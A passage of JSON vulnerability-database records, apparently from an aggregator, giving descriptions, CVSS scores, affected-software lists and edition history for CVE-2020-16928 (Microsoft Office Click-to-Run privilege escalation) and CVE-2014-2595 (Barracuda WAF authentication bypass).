["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16928", "type": "cve", "viewCount": 19}, "different_elements": ["cwe"], "edition": 6, "lastseen": "2021-07-22T08:54:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16928"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T07:37:01", "references": [{"idList": ["MS:CVE-2020-16928"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-02-02T07:37:01", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"}], "hash": "c1bbeaedda49fdf326cc0ce7b227894eb277f86b3c368248583f5e9a4ab7121c", "hashmap": [{"hash": "41963c590f226805fb1fb460db8b1a65", "key": "cvelist"}, {"hash": "725a48d60f4de20c0d99a90ed505ed73", "key": "references"}, {"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "15de0dd4b468af306a6c432a42227be9", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "147a83ecc362fe7740e366e9a77e6b76", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "b93949c2306cf276b053a83670debeba", "key": "modified"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ffddaffc8a726a4ab6205a210963731a", "key": "description"}, {"hash": "f093885b3be9a2577fd825d7e5828b90", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fc1641170d6e1b71afa9fc7076a85c6f", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "id": "CVE-2020-16928", "immutableFields": [], "lastseen": "2021-02-02T07:37:01", "modified": "2020-10-21T20:15:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "reporter": "cve@mitre.org", "title": "CVE-2020-16928", "type": "cve", "viewCount": 16}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T07:37:01"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-16928"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-17T11:07:32", "references": [{"idList": ["MS:CVE-2020-16928"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2020-10-17T11:07:32", "rev": 2, "value": 3.3, "vector": "NONE"}}, "hash": "a31a449d162b9fb556bbbe90f476acdb2c0b17775befc655955af2df80693366", "hashmap": [{"hash": "41963c590f226805fb1fb460db8b1a65", "key": "cvelist"}, {"hash": "725a48d60f4de20c0d99a90ed505ed73", "key": "references"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "modified"}, {"hash": "147a83ecc362fe7740e366e9a77e6b76", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ffddaffc8a726a4ab6205a210963731a", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "f093885b3be9a2577fd825d7e5828b90", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "id": "CVE-2020-16928", "lastseen": "2020-10-17T11:07:32", "modified": "2020-10-16T23:15:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "reporter": "cve@mitre.org", "title": "CVE-2020-16928", "type": "cve", "viewCount": 0}, "differentElements": ["modified"], "edition": 1, "lastseen": "2020-10-17T11:07:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16928"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-04-23T01:09:38", "references": [{"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["MS:CVE-2020-16928"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-04-23T01:09:38", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"}], "hash": "33f687a1b1d633f5b8169d33cbafebf51962ea3c86aff4e429dc282e350f005f", "hashmap": [{"hash": "41963c590f226805fb1fb460db8b1a65", "key": "cvelist"}, {"hash": "725a48d60f4de20c0d99a90ed505ed73", "key": "references"}, {"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "147a83ecc362fe7740e366e9a77e6b76", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "b93949c2306cf276b053a83670debeba", "key": "modified"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "ffddaffc8a726a4ab6205a210963731a", "key": "description"}, {"hash": "cfe79bfa013d4a3b73a902e04505ab33", "key": "cpeConfiguration"}, {"hash": "f093885b3be9a2577fd825d7e5828b90", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fc1641170d6e1b71afa9fc7076a85c6f", "key": "extraReferences"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "id": "CVE-2020-16928", "immutableFields": [], "lastseen": "2021-04-23T01:09:38", "modified": "2020-10-21T20:15:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16928", "type": "cve", "viewCount": 19}, "different_elements": ["modified"], "edition": 5, "lastseen": "2021-04-23T01:09:38"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16928"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-22T10:49:04", "references": [{"idList": ["MS:CVE-2020-16928"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-22T10:49:04", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [], "hash": "69f2cf38ae45dcd41e0460e28bb339bf4f0591df254cc294015764dba898259a", "hashmap": [{"hash": "41963c590f226805fb1fb460db8b1a65", "key": "cvelist"}, {"hash": "725a48d60f4de20c0d99a90ed505ed73", "key": "references"}, {"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "15de0dd4b468af306a6c432a42227be9", "key": "cpeConfiguration"}, {"hash": "147a83ecc362fe7740e366e9a77e6b76", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "b93949c2306cf276b053a83670debeba", "key": "modified"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ffddaffc8a726a4ab6205a210963731a", "key": "description"}, {"hash": "f093885b3be9a2577fd825d7e5828b90", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "id": "CVE-2020-16928", "lastseen": "2020-10-22T10:49:04", "modified": "2020-10-21T20:15:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "reporter": "cve@mitre.org", "title": "CVE-2020-16928", "type": "cve", "viewCount": 13}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-22T10:49:04"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "aa83c9d5d9e85525c325b86ee275ce90"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "e62b06dbf0b010bd7ca3851bfd12bb58"}, {"key": "cpe23", "hash": "34b9d3cd48da8a2ca10ced6c1dc33c44"}, {"key": "cpeConfiguration", "hash": "cfe79bfa013d4a3b73a902e04505ab33"}, {"key": "cvelist", "hash": "41963c590f226805fb1fb460db8b1a65"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "1384068fbd8bc4f34a3a4a821a5848fe"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "ffddaffc8a726a4ab6205a210963731a"}, {"key": "extraReferences", "hash": "fc1641170d6e1b71afa9fc7076a85c6f"}, {"key": "href", "hash": "f093885b3be9a2577fd825d7e5828b90"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "183798fce373747341ba2f32f8021ac7"}, {"key": "published", "hash": "ccdbc538dd5b4d39f6035c206ec1fa15"}, {"key": "references", "hash": "725a48d60f4de20c0d99a90ed505ed73"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "147a83ecc362fe7740e366e9a77e6b76"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1bc34c78190dada3e6b3fbad7b0ec06cf42ba0a8f0a98a65e932d632cd9c9d9d", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2020-16928"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-08-04T16:55:08", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-08-04T16:55:08", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"}], "immutableFields": []}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": 